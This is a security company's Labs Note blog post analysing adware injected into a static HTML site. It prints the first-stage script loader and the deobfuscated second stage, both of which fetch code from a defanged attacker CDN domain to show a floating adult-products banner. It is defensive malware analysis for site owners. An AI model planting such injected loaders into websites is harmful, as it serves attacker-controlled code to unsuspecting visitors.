• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Unwanted Sex Toys Advertisement

November 8, 2016Eugene Wozniak

FacebookTwitterSubscribe

Recently, during an incident response process, we have found an advertisement floating banner on specific pages of an html-based website. Despite what people think, these websites are also targets of attacks and can be infected.

Different from other platforms, the entry point in this scenario is easier to be detected due to the nature of html-based pages (static content) and the reduced number of components that could make the website prone to a particular vulnerability.

The following banner was inadvertently added into the victim’s website and floating through different pages:

After a quick investigation, we found that it was being triggered by the following code:

 <script>    (function(d, s, id) {       var js, fjs = d.getElementsByTagName(s)[0];       if (d.getElementById(id)) return;       js = d.createElement(s);       js.id = id;       js.src = "//cdn[.]googletoolservices[.]com/jquery-ui[.]js";       fjs.parentNode.insertBefore(js, fjs);    }(document, 'script', 'jquery-uisdk'));</script>

The code above is just the first stage of the attack. It accesses the website: cdn[.]googletoolservices[.]com/jquery-ui[.]js and fetches the malicious payload, which is obfuscated with JS Packer compression. After deobfuscating it, we get this script:

var x113110_hit;if (typeof(x113110_hit) == "undefined") {<    (function() {       var params = {};...       var args = '';       for (var i in params) {           if (args != '') {               args += '&'           }           args += i + '=' + encodeURIComponent(params[i])       }       var st = document.createElement('script');       st.type = 'text/javascript';       st.async = true;       st.charset = 'utf-8';       st.src = '//cdn[.]googletoolservices[.]com/jquery[.]js?' + args;       var s = document.getElementsByTagName('script')[0];       s.parentNode.insertBefore(st, s);       x113110_hit = true    })()}

Which renders out the image-based floating banner, leading to an adult toys website when clicking on it (hxxp://www.la-pareja.com/?qn).

This malware could be injected in several pages of the website but not necessarily in all of them, so it’s important to check all html pages for that particular code and more specifically the link

‘cdn[.]googletoolservices[.]com/jquery-ui[.]js’.

If you’re experiencing similar issues in your website and want it to be cleaned up, let us know.

FacebookTwitterSubscribe

Categories: Sucuri LabsTags: Labs Note

About Eugene Wozniak

Eugene Wozniak is Sucuri’s Security Analyst who joined the company in 2016. His main responsibilities include finding malware providing efficient cleanup procedures for Sucuri’s customers, and outlining working solutions for website security. Eugene`s professional experience covers more than a decade of web hosting experience, helpdesk support and web hosting security. When Eugene isn’t working on customers’ security, you might find him creating 3-D art for games and various indie projects, or revisiting his world in Stalker Lost Alpha. Connect with him on LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.